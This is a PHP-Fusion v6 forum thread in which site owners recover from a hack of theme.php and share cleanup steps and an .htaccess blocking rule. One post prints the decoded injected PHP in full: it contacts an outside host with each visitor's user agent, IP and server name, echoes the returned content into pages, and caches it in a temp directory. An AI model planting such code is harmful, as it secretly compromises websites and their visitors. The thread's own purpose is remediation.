echo "<td width='6' valign='bottom' align='left'><img border='0' src='".THEME."images/title-right-corner.gif' width='6' height='22' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' background='".THEME."images/left-tube-bg.gif' valign='top' align='left'><img border='0' src='".THEME."images/left-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "<td class='side-body' colspan='3'>\n";
echo "<div id='box_$title'"; if($open=="off"){ echo "style='display:none'"; } echo ">\n";
}

function closesidex() {
echo "</div></td>\n";
echo "<td width='6' background='".THEME."images/right-tube-bg.gif'><img border='0' src='".THEME."images/right-tube-bg.gif' width='6' height='5' alt=''></td>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td width='6' valign='top' align='left' height='5'><img border='0' src='".THEME."images/bottom-left-corner.gif' width='6' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-bluebg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='50%' height='5' valign='top' align='right' background='".THEME."images/bottom-bluebg.gif'><img border='0' src='".THEME."images/bottom-cascade.gif' width='23' height='5' alt=''></td>\n";
echo "<td width='75' height='5' background='".THEME."images/bottom-silverbg.gif'><img border='0' src='".THEME."images/bottom-silverbg.gif' width='10' height='5' alt=''></td>\n";
echo "<td width='6' height='5'><img border='0' src='".THEME."images/bottom-right-corner.gif' width='6' height='5' alt=''></td>\n";
echo "</tr></table>\n";
}

function tablebreak() {
global $body_bg;

echo "<table width='100%' cellspacing='0' cellpadding='0' bg_color='".$body_bg."'>
<tr><td height='8'></td></tr>
</table>\n";

}
?>


- remove the part that's red. And follow the instruction in thread #1. Can't explain it better.
can't get in to admin panel to do the bits in your instructions?

Sorry if I am being stupid

Have removed /infusions/member_poll_panel
and removed the red text in theme.php

still blank screen

site is www.ukboatyard.com


do I go to DB and edit table fus_panels and manually delete the one called "System"?
deleted the "System" line from the table fus_panels

seems to be back

may be worth noting can't get in to admin panel to delete the panel - seems to need doing from the database manager?

thanks
another of my sites hacked

now fixed but thought might be useful to know more have been hit

both so far on 6.01.18

haven't upgraded cos the themes are not available for v7...
I got hacked too. Any idea how they managed to edit theme.php?
The content of the crypted string:

CodeDownload  
error_reporting(0);

function simple_get($ua, $ra) {
    @$s = fsockopen("pub.anionworld.info",80);
    stream_set_timeout($s, 3);
    fputs($s, "GET /c/check.php?ua=".urlencode($ua)."&ra=".urlencode($ra)."&sn=".urlencode($_SERVER["SERVER_NAME"])." HTTP/1.0\nHost: pub.anionworld.info\n\n");
    $o="";
    while(!feof($s)) $o.=fgets($s,1000);
    $o=substr($o,strpos($o,"\r\n\r\n")+4);
    fclose($s);
    return $o;
}

function recursive_remove_directory($directory, $empty=FALSE) {
    if(substr($directory,-1) == "/") {
        $directory = substr($directory,0,-1);
    }
    if(!file_exists($directory) || !is_dir($directory)) {
        return FALSE;
    }
    elseif(!is_readable($directory)) {
        return FALSE;
    }
    else {
        $handle = opendir($directory);
        while (FALSE !== ($item = readdir($handle))) {
            if($item != "." && $item != "..") {
                $path = $directory."/".$item;
                if(is_dir($path)) {
                    recursive_remove_directory($path);
                }
                else {
                    unlink($path);
                }
            }
        }
        closedir($handle);
        if($empty == FALSE) {
            if(!rmdir($directory)) {
                return FALSE;
            }
        }
        return TRUE;
    }
}

function print_cont($cache=true) { // Get temporary directory $tempdir = ini_get("upload_tmp_dir");
    if(empty($tempdir)) $tempdir = get_cfg_var("upload_tmp_dir");
    if(empty($tempdir)) $tempdir = ini_get("session.save_path");
    if(empty($tempdir)) $tempdir = get_cfg_var("session.save_path");
    if(empty($tempdir)) $tempdir = $_ENV["TMP"];
    if(empty($tempdir)) $tempdir = $_ENV["TMPDIR"];
    if(empty($tempdir)) $tempdir = $_ENV["TEMP"];
    if(empty($tempdir)) $tempdir = dirname(tempnam("", "na"));
    if(empty($tempdir)) $tempdir = ".";
    if ($cache
        && file_exists("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/".md5($_SERVER["HTTP_USER_AGENT"].$_SERVER["REMOTE_ADDR"]))
        && file_exists("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/44510e7e1e498f65ce503c6cc106fce5")) {
            if (file_get_contents("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/".md5($_SERVER["HTTP_USER_AGENT"].$_SERVER["REMOTE_ADDR"]))==="1") $o=file_get_contents("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/44510e7e1e498f65ce503c6cc106fce5");
            else $o="";
    }
    else {
        $o=simple_get($_SERVER["HTTP_USER_AGENT"],$_SERVER["REMOTE_ADDR"]);
            if ($cache) {
                @mkdir("$tempdir/03d4e4d2b2235f5e26e8208148ccc212");
                $f=fopen("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/".md5($_SERVER["HTTP_USER_AGENT"].$_SERVER["REMOTE_ADDR"]), "w+");
                fwrite($f, strlen($o)>1 ? "1" : "0");
                fclose($f);
                if (!file_exists("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/44510e7e1e498f65ce503c6cc106fce5")) {
                    $fp=fopen("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/44510e7e1e498f65ce503c6cc106fce5", "w+");
                    fwrite($fp,simple_get("GoogleBot/Test", "1.1.1.1"));
                    fclose($fp);
                    $fp=fopen("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/b136dd49167daf5faab0cf693bf5c85f","w+");
                    fwrite($fp, time());
                    fclose($fp);
                }
            }
    }
    echo $o;
    if ($cache) {
        if (time()-(int)file_get_contents("$tempdir/03d4e4d2b2235f5e26e8208148ccc212/b136dd49167daf5faab0cf693bf5c85f")>43200) {
            recursive_remove_directory("$tempdir/03d4e4d2b2235f5e26e8208148ccc212");
        }
    }
}

print_cont();

As what was stated with a few modifications:
To all of you v6-users:

If your site is hacked:

1. If you have a Poll running - disable it from: Admin Panel->System Admin->Panels.

2. Open up the file: /themes/YOUR_THEME/theme.php - & delete the long text near to the top of the file. You can't miss it. It will have eval and a long string of numbers)

3. Delete the whole directory via FTP: /infusions/member_poll_panel

4. Open up phpMyAdmin.

5. Click on the left side on "fusion_panels".

6. Delete panel_name: System / panel_filename: ../images/panel.php

7. Change ALL your admin and super admin passwords. They DO have them.

8. It looks like they also grabbed the config.php so if possible change your PW in that and in phpMyAdmin for the database.

9. In your /images directory, delete panel.php

10. Suggested, but not required, but might help stop hack attempts. In your .htaccess add the following lines:
RewriteEngine on
RewriteBase /
RewriteCond %{QUERY_STRING} ^_SERVER\[DOCUMENT_ROOT\]=*
RewriteRule ^$ /error404.html$ [NC,L]

EDIT: NOTE this may NOT prevent them from hacking your system again. It cures the symptoms but doesn't (I believe) fix the original exploit.
Can I suggest that your step 1 is not possible as the hacked site will have a blank screen so no way to login to Admin panel etc...

Also at step 7 (being pedantic) there won't be any super admin passwords for v6 sites

and more importantly

THANKS

for these fixes - I would have been really stuck without your help
Thanks to everyone for all the help with this.

I have fixed things up on my site using the instructions, except I can't find a .htaccess file,
so don't know what to do with that part.

It would be wonderful if someone could explain the vulnerability to me (perhaps in a PM)
so I can do what I need to to prevent further exploitation while I work on the upgrade
to V7 (have some work to do since I have quite a few V6 specific mods that I need to research).

I'm assuming that V7 is not vulnerable - it would be good to understand why that it.

Simon.

PS I am still on v6.01.13
author smokeman
forumBugs and Errors - 6
replies42 posts
viewed46,473 times
activeLast updated on 9 years ago
You can view all discussion threads in this forum.
You can start a new discussion thread in this forum.
You cannot reply in this discussion thread.
You cannot start on a poll in this forum.
You cannot upload attachments in this forum.
You cannot download attachments in this forum.